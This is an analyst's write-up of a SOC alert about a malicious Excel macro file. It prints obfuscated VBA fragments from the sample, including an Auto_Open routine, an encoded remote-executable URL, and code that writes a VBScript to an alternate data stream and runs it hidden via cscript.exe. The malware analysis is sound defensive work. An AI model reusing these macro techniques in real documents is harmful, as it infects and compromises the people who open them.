# Case Details
EventID : 77

Event Time : Mar, 13, 2021, 08:20 PM

Rule : SOC138 - Detected Suspicious Xls File

Level : Security Analyst

Source Address : 172.16.17.56

Source Hostname : Sofia

File Name : ORDER SHEET & SPEC.xlsm

File Hash : 7ccf88c0bbe3b29bf19d877c4596a8d4

File Size : 2.66 Mb

Device Action : Allowed

Download (Password:infected) : 
7ccf88c0bbe3b29bf19d877c4596a8d4.zip

# Static Analysis
- Okay we have a zip file, upon unzipping 1 file is decompressed `ORDER SHEET & SPEC.xlsm`
- File type is `ORDER SHEET & SPEC.xlsm: Microsoft OOXML` which stands for Open Office XML

## Hashes
- `7ccf88c0bbe3b29bf19d877c4596a8d4  ORDER SHEET & SPEC.xlsm`

## Scanners
- Always check with scanners to see what we're dealing with it, it could be old malware.
- [VirusTotal scan shows an alarming amount of flags](https://www.virustotal.com/gui/file/7bcd31bd41686c32663c7cabf42b18c50399e3b3b4533fc2ff002d9f2e058813)
![Scan Results](virustotal.PNG)

- Seems to be a lot of reference to CVE-2017-11882

## CVE-2017-11882
- According to Kasperky, Malware of this family exploits a vulnerability of Microsoft Equation Editor (often included in Microsoft Office). If an attack succeeds, the attacker gains the ability to execute some code under a user’s account.

- So it seems to be leveraging an exploit to execute code under a user account. Cool.

# Start of actual static analysis
- I like to use [Zelsters reference for tools](https://zeltser.com/analyzing-malicious-documents/)
- So let's start with `olevba` which is a tool that can locate and extract macros
- And... lo and behold

```vba
Const SW_SHOW = 1
Const SW_SHOWMAXIMIZED = 3
Const SW_SHOWMINIMIZED = 0

'// Properties API
Private Type SHELLEXECUTEINFO
    cbSize       As Long
    fMask        As Long
    hwnd         As Long
    lpVerb       As String
    lpFile       As String
    lpParameters As String
    lpDirectory  As String
    nShow        As Long
    hInstApp     As Long
    lpIDList     As Long
    lpClass      As String
    hkeyClass    As Long
    dwHotKey     As Long
    hIcon        As Long
    hProcess     As Long
End Type
#If Win64 Then
Public Declare PtrSafe Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
Public Declare Function ShxllExxcute     Lib "SHELL32.dll"         Alias "ShellExecuteA" (             ByVal Hwnd As Long,             ByVal lpOperation As String,             ByVal lpFile As String,             ByVal lpParameters As String,             ByVal lpDirectory As String,             ByVal nShowCmd As Long) As Long
#End If
#If Win64 Then
Private Declare PtrSafe Function ShellExecuteEx     Lib "SHELL32.dll" (         Prop As SHELLEXECUTEINFO) As Long
#Else
Private Declare Function ShellExecuteEx     Lib "SHELL32.dll" (         Prop As SHELLEXECUTEINFO) As Long
#End If
Public Function fnGetPropDlg(strFilepath As String) As Long
Dim Prop As SHELLEXECUTEINFO
With Prop
    .cbSize = Len(Prop)
    .fMask = &HC
    .hwnd = 0&
    .lpVerb = "properties"
    .lpFile = strFilepath
End With
fnGetPropDlg = ShellExecuteEx(Prop)
End Function
'----------
Sub highlightSpecificValues()
Dim rng As Range
Dim i As Integer
Dim c As Variant
c = InputBox("Enter Value To Highlight")
For Each rng In ActiveSheet.UsedRange
If rng = c Then
rng.Style = "Note"
i = i + 1
End If
Next rng
MsgBox "There are total " & i & " " & c & " in this worksheet."
End Sub
Sub Auto_Open()
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"


mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = ""kk""" + vbCrLf
mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = ""xbraHRUcHM6Ly9tdWx0aXdhcmV0ZWNub2xvZ2lhLmNvbS5ici9qcy9Qb2RhbGlyaTQuZXhl"" " + vbCrLf
mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = Mid(vrh5kryyj4kiwq6ui, 4)" + vbCrLf
mu38swif2 = mu38swif2 & "uiytvdverwt67fhrey =""gy5UG9kYWxpcmk0LmV4ZQ==""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/
.....
```
- And this is only half of the code, this is VBA, a human readable programming code that you can use along with office applications to record macros. And yes threat actors also do use them
for malicious purposes

## Deobfuscation
- De-obfuscation is the act of you might guess it, reverse of obfuscation.
- You'd be suprised how long the code it's over 800 lines, so as an analyst you need to have a gut feeling to know where the jackspot is, if we scroll down a bit we'll see interesting stuff.

```vba
Dim mkggbetyuryjw As String
mkggbetyuryjw = "WS" 'WS
minf = 50
If Application.OperatingSystem Like "*Window*" Then
    mkggbetyuryjw = mkggbetyuryjw + "c" = 'WSC
    mkggbetyuryjw = mkggbetyuryjw + "ri" = 'WSCRI
    If Application.OperatingSystem Like "*Window*" Then
        If Application.OperatingSystem Like "*Window*" Then
            If Application.OperatingSystem Like "*Window*" Then
                If Application.OperatingSystem Like "*Window*" Then
                    If Application.OperatingSystem Like "*Window*" Then

                    End If
                    y76564546567 = veiure5278eu2 + m67t7873r72
                End If
            End If
        End If
    End If
End If
RetVal = ShxllExxcute(0, "open", veiure5278eu2, m67t7873r72, "", SW_SHOWMINIMIZED)
```
- Okay we see some variables and we see strings that indicate it's trying to spell `wscript`, `wscript` as you guessed is used to execute scripts. We also see `ShxllExxcute` which is actually an alias if you checked at the top of the file.

```vba
#If Win64 Then
Public Declare PtrSafe Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
Public Declare Function ShxllExxcute     Lib "SHELL32.dll"         Alias "ShellExecuteA" (             ByVal Hwnd As Long,             ByVal lpOperation As String,             ByVal lpFile As String,             ByVal lpParameters As String,             ByVal lpDirectory As String,             ByVal nShowCmd As Long) As Long
#End If
```
- It's an alias towards `ShellExecuteA`, ShellExecuteA is used to perform an operation on a specified file. 
- So back to analysis if we follow the if statements
```vba
If Application.OperatingSystem Like "*Window*" Then
    mkggbetyuryjw = mkggbetyuryjw + "c" = 'WSC
    mkggbetyuryjw = mkggbetyuryjw + "ri" = 'WSCRI
    If Application.OperatingSystem Like "*Window*" Then
        If Application.OperatingSystem Like "*Window*" Then
            If Application.OperatingSystem Like "*Window*" Then
                If Application.OperatingSystem Like "*Window*" Then
                    If Application.OperatingSystem Like "*Window*" Then

                    End If
                    y76564546567 = veiure5278eu2 + m67t7873r72
```
- But the actual variable of `y76564546567` is never used, but `veiure5278eu2` and `m67t7873r72` is used, let's rename it to `arg1` and `arg2`.
- Let's look at `arg1` where it's used in the file.

```vba
x = "C"
x = x + ":\" 'iuuv37
x = x + "pr" 'iuuv37
x = x + "ogramd" 'iuuv37
x = x + "ata"
x = x + "\asc"
x = x + "."
x = x + "txt"
xxxxxpath = "Win"
xxxxxpath = xxxxxpath + "dows\"
difudteje = "s"
difudteje = difudteje + "yst"
difudteje = difudteje + "em32"
malcoeyw29f = "C:\"
hournow = Hour(Time())
If hournow < 30 Then
fgwrfguery = "."
End If
fgwrfguery = fgwrfguery + "ex"
arg1 = malcoeyw29f + xxxxxpath + difudteje + "\c"
xcbhnjftr = "ri"
xcbhnjftr = xcbhnjftr + "pt"
arg1 = arg1 + "sc" + xcbhnjftr + fgwrfguery

    If Application.OperatingSystem Like "*Window*" Then
        If DatePart("w", Date, vbMonday) > 0 Then
            arg1 = arg1 + yyyyvar
        End If
```
- So the variable `x` if we add it up , it's spelling `c:\programdata\asc.txt`, weird but okay.
- Now let's look at `xxxxxpath`, it's spelling `windows\`.
- Now `difudteje`, spelling `system32`
- Okay and finally we get to the point where `arg1` is assembled, we get `C:\windows\system32\c`
- Then `xcbhnjftr` which we will get `ript`
- Then the final assembly of `arg1`, we get `C:\windows\system32\cscript.ex, but we're missing an `e`,
- The final `e` to complete `arg1` to be `.exe` comes from `yyyyvar` which is declared uptop.
```vba
yyyyvar = "e"
yyyyvar = yyyyvar + " "
```
- So now we get the complete `C:\windows\system32\cscript.exe`, Windows Scripting Host which runs script files.

- So we completed arg1, what about arg2?

- So searching up for arg2, it starts around here.
```vba
almvar = "v" + vch + "s"

llmvusvhsd78 = llmvusvhsd78 + "ipt"
llmvusvhsd78 = llmvusvhsd78 + "1"
If Application.OperatingSystem Like "*Window*" Then
If Application.OperatingSystem Like "*Window*" Then
    mytytrui7654eyhurdiot5lkjyh = x + ":" + bbbmap + "scr" + llmvusvhsd78 + "." + almvar
End If
End If

If DatePart("w", Date, vbMonday) > 0 Then
    arg2 = mytytrui7654eyhurdiot5lkjyh
End If

hhyvbvdtxct = brjysrjynryyyyyyyyf
xiocyrftreubg = 2 - 1
If Application.OperatingSystem Like "*Window*" Then
    Dim KillFile As String
    KillFile = arg2
    KillFile = Right(KillFile, 11)
    If Len(Dir$(KillFile)) > 0 Then
    SetAttr KillFile, vbNormal
      Kill KillFile
    End If
    Open arg2 For Append As xiocyrftreubg
End If
```
- We see it's setting the value of arg2 to `mytytrui7654eyhurdiot5lkjyh`, let's look at that.
- So we see `llmvusvhsd78` apart of that, it's spelling `ipt1`.
- And `almvar` also part of that, but it's also referencing `vch`, if we take a look at `vch`.

```vba
vch = Left(l85y8, 1)
```
- `l85y8` contains the the string `bb`, after using left we will get the only letter `b`
- So returning back to `almvar`, we should get `vbs` which stands for virtual basic script.
- So what's the end assembly of arg2? It should now be `c:\programdata\asc.txt:script1.vbs`

# Final analysis
Okay so back to the execution of program.
```vba
ShxllExxcute(0, "open", arg1, arg2, "", SW_SHOWMINIMIZED)
```
- Let's replace arg1 and arg2 with the previous discoveries.
```vba
ShxllExxcute(0, "open", C:\windows\system32\cscript.exe, c:\programdata\asc.txt:script1.vbs, "", SW_SHOWMINIMIZED)
```
- Okay from this behavior, we can tell that it's trying to execute `script1.vbs` using `csript.exe` which is a legitimate windows program. It will open it minimized to not alert the user.
- That's enough to deduct that this program is malicious as it's trying to open a file which is not related to the document. The file must have been written in the macro and further analysis must be made to see the actual content of the script.
